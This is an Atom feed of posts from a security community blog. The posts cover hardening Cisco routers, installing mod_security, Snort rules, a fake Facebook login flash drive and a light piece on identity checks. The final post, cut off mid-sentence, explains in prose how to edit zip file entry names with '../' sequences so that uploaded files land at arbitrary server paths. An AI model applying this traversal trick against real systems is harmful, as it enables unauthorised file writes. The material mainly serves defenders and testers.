<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6034918612419541942</id><updated>2012-01-26T10:19:19.826-08:00</updated><category term='apache'/><category term='GSSP-C'/><category term='facebook'/><category term='false positives'/><category term='sguil'/><category term='router'/><category term='modsecurity'/><category term='data security'/><category term='web'/><category term='usb'/><category term='security'/><category term='open relay'/><category term='SANS'/><category term='IDs'/><category term='matchbox twenty'/><category term='postfix'/><category term='Apple'/><category term='application'/><category term='classful'/><category term='forensics'/><category term='virtualbox tun/tap bridge backtrack'/><category term='cidr'/><category term='cisco'/><category term='exfiltration'/><category term='certification'/><category term='IOS'/><category term='subnet'/><category term='spam'/><category term='entertainment'/><category term='netmask'/><category term='concert'/><category term='sheep'/><category term='ubuntu'/><category term='firewall'/><category term='mod_security'/><category term='wristband'/><title type='text'>PaulDotCom Community Blog</title><subtitle type='html'>A blog for the security community, by the security community</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/'/><link rel='hub' 
href='http://pubsubhubbub.appspot.com/'/><author><name>PaulDotCom</name><uri>http://www.blogger.com/profile/05361577336068292461</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='26' src='http://4.bp.blogspot.com/_RMcDn0JHHhU/SaV2wOlQaqI/AAAAAAAAAB8/qJW0c1cKct8/S220/paulabout.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>15</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-696192133087323667</id><published>2010-05-06T12:36:00.000-07:00</published><updated>2010-05-06T14:04:27.436-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='facebook'/><category scheme='http://www.blogger.com/atom/ns#' term='sheep'/><category scheme='http://www.blogger.com/atom/ns#' term='usb'/><title type='text'>Flash drive with fake Facebook login...</title><content type='html'>I find myself thinking "does anyone fall for this stuff?"&amp;nbsp; Well, obviously the answer to that is "YES!!"&amp;nbsp; Uh, yeah, don't just use something because someone tells you.&amp;nbsp; People, wake up, this stuff isn't real!!! 
:-)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sunbeltblog.blogspot.com/2010/05/facebook-remote-login-flash-drive.html"&gt;Sunbelt Blog: Facebook Remote Login + Flash drive = stolen credentials&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;a href="http://www.sunbeltsoftware.com/alex/gblog/facebkflashdrve2_thumb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="161" src="http://www.sunbeltsoftware.com/alex/gblog/facebkflashdrve2_thumb.jpg" width="320" /&gt;&lt;/a&gt;&lt;a href="http://www.sunbeltsoftware.com/alex/gblog/facebkflashdrvesite_thumb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="154" src="http://www.sunbeltsoftware.com/alex/gblog/facebkflashdrvesite_thumb.jpg" width="320" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Chris&amp;nbsp;Shameless plug: LABrat.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-696192133087323667?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/696192133087323667/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=696192133087323667' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/696192133087323667'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/696192133087323667'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2010/05/flash-drive-with-fake-facebook-login.html' title='Flash drive with fake Facebook 
login...'/><author><name>Chris</name><uri>http://www.blogger.com/profile/05257222772910088784</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_e1RGn618Fv0/S84Cf9Ub53I/AAAAAAAAAAM/s6BspPW35jc/S220/1a2e5aa.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-5950822719727018465</id><published>2010-02-22T17:45:00.000-08:00</published><updated>2010-02-22T17:45:38.925-08:00</updated><title type='text'>Writing Snort Rules is harder than it looks</title><content type='html'>Rather than reposting the entire article here, I'd prefer to just link to it:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://blog.joelesler.net/2010/02/writing-snort-rules-is-harder-than-it-looks.html"&gt;http://blog.joelesler.net/2010/02/writing-snort-rules-is-harder-than-it-looks.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This post took me a couple hours to write, and I try and illustrate how to take a Snort rule and really take your time when writing it in order to get it right. 
Understanding the Snort syntax is a huge undertaking, but well worth your time once you get it right.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-5950822719727018465?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/5950822719727018465/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=5950822719727018465' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/5950822719727018465'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/5950822719727018465'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2010/02/writing-snort-rules-is-harder-than-it.html' title='Writing Snort Rules is harder than it looks'/><author><name>Joel Esler</name><uri>http://www.blogger.com/profile/05018134738510159518</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://bp2.blogger.com/_BpBcl5urwoc/SGEd_P7nmEI/AAAAAAAAAKA/EJkaqvwmX0o/S220/Headshot.png'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-2553178140208058451</id><published>2008-12-13T05:24:00.000-08:00</published><updated>2008-12-13T07:14:52.501-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='entertainment'/><category scheme='http://www.blogger.com/atom/ns#' term='IDs'/><category scheme='http://www.blogger.com/atom/ns#' term='false positives'/><title type='text'>Identifying Garbage Men</title><content type='html'>Tis the season for tipping &lt;a 
href="http://en.wikipedia.org/wiki/Garbage_man"&gt;garbage men&lt;/a&gt;. Here in Brussels, at the end of the year, garbage men would ring your doorbell during their round, presenting you their best wishes for the new year.&lt;br /&gt;&lt;br /&gt;This tradition came to an end several years ago. Nowadays, they present you their best wishes when they're off-duty. And in came a new ID problem...&lt;br /&gt;&lt;br /&gt;Identifying garbage men at work is quite easy and rather fool-proof. The work-clothing they wear and their activity (filling the garbage truck with your garbage) is a good give-away. Would-be impostors face a rather high cost (obtaining a garbage truck, even stealing one comes with a cost) to impersonate garbage men at work.&lt;br /&gt;&lt;br /&gt;Reliably identifying off-duty garbage men is a bigger problem. As you've only their (work-) clothes and verbal claims as evidence to help you in distinguishing real garbage men from impostors, your rate of false positives increases. As the cost of obtaining work-clothes to fool you will probably be outweighed by the amount of collected tips, impostors stand a chance to make a profit, and hence the probability of fake garbage men ringing your doorbell increases.&lt;br /&gt;&lt;br /&gt;But is this really your problem? From an economics point of view: no!&lt;br /&gt;Let's assume you tipped an impostor, and a few days later, a real garbage man rings your doorbell. Will you tip him too? I know here in Brussels, a substantial group of people won't. Because you're still facing the same identification problem (is this a real garbage man?), but this time, you're more suspicious. So your rate of false negatives increases.&lt;br /&gt;And your risk of receiving bad service for not tipping the genuine garbage men is rather low. 
The real garbage men might be disgruntled, but then again, most realize that it's not that you don't want to tip garbage men in general, it's just that they were impersonated.&lt;br /&gt;&lt;br /&gt;To summarize: genuine garbage men face an economic loss from the activity of impostors, you don't. Hence the ID problem is really the garbage men's problem, not yours.&lt;br /&gt;&lt;br /&gt;The solution the garbage men in Brussels adopted is to deposit some form of photo ID for garbage men in your mailbox, weeks before the tipping occurs. This document will assist you in distinguishing the real from the fake.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://didierstevens.wordpress.com/files/2008/12/garbagemen-r.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;I invite you to post comments with ways to improve or break their system.&lt;br /&gt;&lt;br /&gt;Somewhere I'm tempted to alter this "photo ID" (i.e. replacing the pictures), and challenge the first garbage man ringing my doorbell. I picture me saying: "Ja mo kadeike, a foto stoet e ni op!" (as Google translate doesn't support Brussels dialect yet, let me translate loosely: "Hey kid, your picture doesn't match!"). 
But then again, it's the season to be merry, and I'm a satisfied customer, so I won't be a jerk.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-2553178140208058451?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/2553178140208058451/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=2553178140208058451' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/2553178140208058451'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/2553178140208058451'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/12/identifying-garbage-men.html' title='Identifying Garbage Men'/><author><name>Didier Stevens</name><uri>http://www.blogger.com/profile/17537511475658709281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-2170677366993670867</id><published>2008-10-03T16:24:00.001-07:00</published><updated>2008-10-03T20:30:17.827-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IOS'/><category scheme='http://www.blogger.com/atom/ns#' term='cisco'/><category scheme='http://www.blogger.com/atom/ns#' term='router'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Securing Cisco Routers the Easy Way</title><content type='html'>&lt;span style="font-family:Trebuchet MS;font-size:85%;"&gt;After hearing about Fyodor's scanning the 
Internet project, I started thinking about what he found...My reaction was much the same as Paul's...Telnet??? Really? Then I started thinking about the work I did back in the day when I was dangerously unqualified to do my job and had no idea what I was doing, and how many Cisco routers I left telnet open on the WAN interface simply for convenience. Over the years, I've found most consulting companies do this without telling the customer, and if you're using an outside vendor to manage your Cisco gear, I would check! Having had to do quite a bit of router securing lately, I thought this would be a good time to cover some really simple ways to secure your routers for the non-Cisco guys out there, other than the obvious firmware updates and such. All of these methods should work on the more recent versions of the IOS. This post will cover some very basic router security methods.&lt;/span&gt;  &lt;span style="font-family:trebuchet ms;font-size:85%;"&gt;There is a real science to securing Cisco IOS devices, and it's certainly possible to make your router security scheme very complex, but hopefully this gives you a good starting point if you're not already doing these things.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Trebuchet MS;font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-family:Trebuchet MS;font-size:85%;"&gt;Adding Local Users&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;span style="font-family:Trebuchet MS;font-size:85%;"&gt;One of the simplest ways to lock down your Cisco gear is by adding a local authentication database to your router. This is something that Cisco simply doesn't stress enough. Even if you go through their CCNA training, they teach you there's a password to log in (telnet, console, etc.) and the enable password, both of which are subject to brute forcing...But think about how much more secure your gear is if an attacker has to guess both a username and a password. 
It would certainly render brute forcing impossible. Here's a simple example:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Trebuchet MS;font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Larry(config)#aaa new-model &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Larry(config)#username Larry privilege 15 password beer &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Larry(config)#aaa authentication login default local&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Trebuchet MS;"&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Looking at what we did, we first enabled authentication, authorization, and accounting services on our router. We then created a user named Larry with a password of beer that has a privilege level of 15. We then set the default login method for all management on the router to use the local database (i.e. usernames and passwords we create on the router itself). Now when telnetting in, connecting via a console cable, SSH, whatever, the user must present two sets of credentials. Of course if you make the username admin, cisco, etc. then this isn't a whole lot better, but using an uncommon username and password helps. You can do a lot more with creating limited privilege user accounts, custom views, authenticating and authorizing command execution via TACACS+ and RADIUS, and password policies but that's beyond the scope of this post.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:85%;"&gt;Enabling SSH&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Solving the problem of telnet's plain text transmission is actually quite simple. Before starting make sure you are on IOS version 12.1(19)E because that's the first revision that supports SSHv2. 
Enabling SSH on a router requires two lines:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Larry(config)#ip domain-name pauldotcom.com&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Larry(config)#crypto key generate rsa modulus 1024 general-keys&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;The name for the keys will be: Larry.pauldotcom.com&lt;br /&gt;% The key modulus size is 1024 bits&lt;br /&gt;% Generating 1024 bit RSA keys, keys will be non-exportable...[OK]&lt;br /&gt;Larry(config)#*Mar 1 00:19:52.391: %SSH-5-ENABLED: SSH 1.99 has been enabled&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Courier New;font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;First we have to specify a domain name using the ip domain-name command so our router has an FQDN, then generate our keys. You can specify whatever key size you want (I used 1024 in the above example). After that SSH is automatically turned on for you. To get rid of telnet management completely, we have to do one more thing:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Larry(config)#line vty 0 4&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Larry(config-line)#transport input ssh&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;strong&gt;Router Auto Secure&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Cisco routers have lots of services running on them, most of them totally useless. Cisco has now provided an easy way to disable these services and enhance the security of your router in a number of ways with one command. 
Also if you use Cisco Secure Device Manager (SDM) for router management, it features a security audit tool and a one click lockdown tool for disabling these services. I'm still a console guy though, so I like this method. Look at how much useless stuff is turned off just after the first step, and how much you get by running one simple command:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Trebuchet MS;"&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Larry#auto secure&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Is this router connected to internet? [no]:&lt;br /&gt;Securing Management plane services...&lt;br /&gt;Disabling service finger&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Disabling service pad&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Disabling udp &amp;amp; tcp small servers&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Enabling service password encryption&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Enabling service tcp-keepalives-in&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Enabling service tcp-keepalives-out&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Disabling the cdp protocol&lt;br /&gt;Disabling the bootp server&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Disabling the http server&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Disabling the finger service&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Disabling source routing&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Disabling gratuitous 
arp&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Courier New;font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;font-size:85%;"&gt;Finger? Come on. The wizard does a lot more, allowing you to set your login banner (and providing a pretty scary default one), configure an enable secret, set up blocking periods when login attacks are detected, and enable the CBAC firewall. &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Trebuchet MS;font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:Trebuchet MS;font-size:85%;"&gt;So there you have it. I hope this was interesting, and be sure to find me lurking around #pauldotcom if you have any questions or comments.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-2170677366993670867?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/2170677366993670867/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=2170677366993670867' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/2170677366993670867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/2170677366993670867'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/10/securing-cisco-routers-easy-way.html' title='Securing Cisco Routers the Easy Way'/><author><name>tcstool</name><uri>http://www.blogger.com/profile/00116595382719439424</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-1355602500233460827</id><published>2008-09-30T21:37:00.000-07:00</published><updated>2009-04-12T19:07:26.075-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='application'/><category scheme='http://www.blogger.com/atom/ns#' term='firewall'/><category scheme='http://www.blogger.com/atom/ns#' term='mod_security'/><category scheme='http://www.blogger.com/atom/ns#' term='apache'/><category scheme='http://www.blogger.com/atom/ns#' term='web'/><category scheme='http://www.blogger.com/atom/ns#' term='ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='modsecurity'/><title type='text'>Installing The mod_security Module for Apache on Ubuntu</title><content type='html'>&lt;span style="font-size:130%;"&gt;What is mod_security?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Mod_security is a filter for requests and responses sent to and from an Apache web server.  It is the "snort" of web applications.&lt;br /&gt;&lt;br /&gt;As an example, let's say "super haxor" starts up their kiddie "Auto Haxs 4000" script and begins to pummel your web server with every known vulnerability for every known web application - perhaps even vulnerabilities that are not known to the public.  As mod_security parses each request to your web server, it matches super haxor's requests to patterns that indicate attempts to exploit SQL injections, command injections, XSS attacks, etc. and it displays a generic error message.  The attack attempts from super haxor never touch your web application.&lt;br /&gt;&lt;br /&gt;In another scenario, Paul and Larry are doing a penetration test on your web server.  They find a page that produces a 404 error, hoping to get the details of the operating system and web server in order to gather information about the box.  
As the response is returned to Paul and Larry, mod_security matches the server information in the response and changes it to a generic, administrator-defined message.&lt;br /&gt;&lt;br /&gt;Obviously mod_security adds another layer of protection to your web server and the applications it hosts in keeping with pauldotcom.com's "defense in depth" mantra.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;How do I install mod_security?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This guide covers installing mod_security on Ubuntu 7.10 for Apache 2.  There is no package for mod_security in Ubuntu due to licensing issues, so we have to install it from source. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;Use the Source, Luke&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Download the latest mod_security tars from the mod_security site.  http://www.modsecurity.org/download/direct.html .  You will only need the current modsecurity-apache archive.&lt;br /&gt;&lt;br /&gt;Now get the necessary packages for compiling mod_security on Ubuntu with this command:&lt;br /&gt;&lt;tt&gt;&lt;br /&gt;sudo apt-get install automake g++ apache2-threaded-dev \&lt;br /&gt;    dpkg-dev libxml2 libxml2-dev&lt;br /&gt;&lt;/tt&gt;&lt;br /&gt;Now compile and install mod_security with the following commands:&lt;br /&gt;&lt;tt&gt;&lt;br /&gt;cd &amp;lt;modsecurity download directory&amp;gt;/apache2&lt;br /&gt;./configure&lt;br /&gt;make&lt;br /&gt;sudo make install&lt;br /&gt;&lt;/tt&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;Apache Conf Files&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now that the mod_security binary is installed in your Apache 2 modules folder, we have to make a few configuration files so that Apache knows to use the module. 
&lt;br /&gt;&lt;br /&gt;Create a file called /etc/apache2/mods-available/security2.load with the following contents:&lt;br /&gt;&lt;tt&gt;&lt;br /&gt;LoadFile /usr/lib/libxml2.so&lt;br /&gt;LoadModule security2_module /usr/lib/apache2/modules/mod_security2.so&lt;br /&gt;&lt;br /&gt;&amp;lt;IfModule !mod_security2.c&amp;gt;&lt;br /&gt;   error_mod_security2_is_not_loaded&lt;br /&gt;&amp;lt;/IfModule&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;IfModule mod_security2.c&amp;gt;&lt;br /&gt;   Include /etc/apache2/modsecurity_crs/*.conf&lt;br /&gt;&amp;lt;/IfModule&amp;gt;&lt;br /&gt;&lt;/tt&gt;&lt;br /&gt;Next create a /etc/apache2/modsecurity_crs directory and copy all of the Core Rules into it (the download directory and its rules/ subdirectory form one path, so keep them together on the command line):&lt;br /&gt;&lt;tt&gt;&lt;br /&gt;sudo mkdir /etc/apache2/modsecurity_crs&lt;br /&gt;sudo cp -R &amp;lt;mod_security download directory&amp;gt;/rules/*.conf \&lt;br /&gt;    /etc/apache2/modsecurity_crs/&lt;br /&gt;&lt;/tt&gt;&lt;br /&gt;You should now take a look at the rule files to make sure the settings are as you like them.  For the most part I only modified lines in the modsecurity_crs_10_config.conf file.  This file will allow you to enable different portions of the engine.  I enabled the directives to scan all XML content.  In particular you will want to look at the paths where mod_security stores its log files.  
I changed all of the log directories to the following:&lt;br /&gt;&lt;tt&gt;&lt;br /&gt;SecUploadDir  /var/log/modsecurity/SecUploadDir&lt;br /&gt;SecAuditLog   /var/log/modsecurity/SecAuditLog/modsec_audit.log&lt;br /&gt;SecAuditLogStorageDir    /var/log/modsecurity/SecAuditLogStorageDir&lt;br /&gt;SecDebugLog             /var/log/modsecurity/SecDebugLog/modsec_debug.log&lt;br /&gt;SecDataDir   /var/log/modsecurity/SecDataDir&lt;br /&gt;SecTmpDir   /var/log/modsecurity/SecTmpDir&lt;br /&gt;&lt;/tt&gt;&lt;br /&gt;After the settings were made I created the directories and set proper permissions with the following commands:&lt;br /&gt;&lt;tt&gt;&lt;br /&gt;sudo mkdir /var/log/modsecurity&lt;br /&gt;sudo mkdir /var/log/modsecurity/SecDataDir&lt;br /&gt;sudo mkdir /var/log/modsecurity/SecTmpDir&lt;br /&gt;sudo mkdir /var/log/modsecurity/SecUploadDir&lt;br /&gt;sudo mkdir /var/log/modsecurity/SecAuditLog&lt;br /&gt;sudo mkdir /var/log/modsecurity/SecAuditLogStorageDir&lt;br /&gt;sudo mkdir /var/log/modsecurity/SecDebugLog&lt;br /&gt;sudo chown -R www-data:www-data /var/log/modsecurity&lt;br /&gt;sudo chmod -R a-rwx /var/log/modsecurity/&lt;br /&gt;sudo chmod -R u+rwx /var/log/modsecurity/&lt;br /&gt;&lt;/tt&gt;&lt;br /&gt;I also had some trouble using mod_security with my Drupal installation.  Mod_security was rejecting the application/xml request type, so I added "application/xml" to the regular expression in modsecurity_crs_30_http_policy.conf on line 72.  It now looks like this:&lt;br /&gt;&lt;tt&gt;&lt;br /&gt;SecRule REQUEST_HEADERS:Content-Type "!(?:^(?:application\/x-www-form-urlencoded(?:;(?:\s?charset\s?=\s?[\w\d\-]{1,18})?)??$|multipart/form-data;)|text/xml|application/xml)"&lt;br /&gt;&lt;/tt&gt;&lt;br /&gt;There are also some other rule sets in the modsecurity-apache_2.1.5/rules/optional_rules/ directory.  
You may want to take a look at them and place them into your /etc/apache2/modsecurity_crs/ if desired.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;Enable and Test&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You should now have everything in place to run Apache 2 with mod_security.  It is time to enable the module and restart apache.&lt;br /&gt;&lt;tt&gt;&lt;br /&gt;sudo a2enmod security2&lt;br /&gt;sudo /etc/init.d/apache2 reload&lt;br /&gt;&lt;/tt&gt;&lt;br /&gt;Hopefully Apache 2 restarts fine with no errors.  Once Apache 2 has restarted, go ahead and test your web application with mod_security enabled.  If you find that your web application is now working improperly, you can debug the mod_security rule that is blocking it by taking a look at the audit log and using the fabulous  web application debugging tool &lt;a href='https://addons.mozilla.org/en-US/firefox/addon/1843'&gt;Firebug&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;Conclusion&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If you are deploying an Apache 2 server that is going to be running any sort of web application, I highly recommend that you take a look at mod_security.  
The hour you spend installing it could save you from a lawsuit or embarrassing explanations to your customers.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6034918612419541942-1355602500233460827?l=pauldotcommunity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/1355602500233460827/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=1355602500233460827' title='18 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/1355602500233460827'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/1355602500233460827'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/09/installing-modsecurity-module-for.html' title='Installing The mod_security Module for Apache on Ubuntu'/><author><name>dehaul</name><uri>http://www.blogger.com/profile/08310444280684989372</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='http://3.bp.blogspot.com/_ZzednK_6oYQ/TI6qA9sr8MI/AAAAAAAAAAM/zFkrT8yrGCM/S220/dogman.jpg'/></author><thr:total>18</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-6196435236097212330</id><published>2008-07-02T07:46:00.000-07:00</published><updated>2008-07-02T07:52:22.811-07:00</updated><title type='text'>(Blog wakeup call) Tip of the Moment: Zip Traversal</title><content type='html'>Well I didn't think this was worth a post before, but it's been ages since the last post, so it's about time something got stuck up here. 
So I bring you my handy tip of the moment: Zip traversal.&lt;br /&gt;&lt;br /&gt;Sometimes you come across a system that allows upload in zip format to save bandwidth. The zip file is then decompressed by the system after upload. Anywhere there's file upload should get your arbitrary file upload senses tingling, but unfortunately it (hopefully) does the same to developers. The upload destination folder may not allow execution, have any mappings to run web scripts or may be outside of the webroot if a website is being targeted.&lt;br /&gt;&lt;br /&gt;But depending on how the unzip routine used by the application works, there may yet be a way to upload files to arbitrary locations. By editing a zip file to give certain files in the archive names that start with a series of "../" you can traverse back up to the root of the file system and then specify whatever path you feel like. This can be done, for example, by zipping a file with a long file name and editing the zip file in a hex editor, changing the extra letters of the file name to ../ as needed.&lt;br /&gt;&lt;br /&gt;This of course depends on the local file permissions and the user the unzipping process runs under. It also depends on whether the unzip 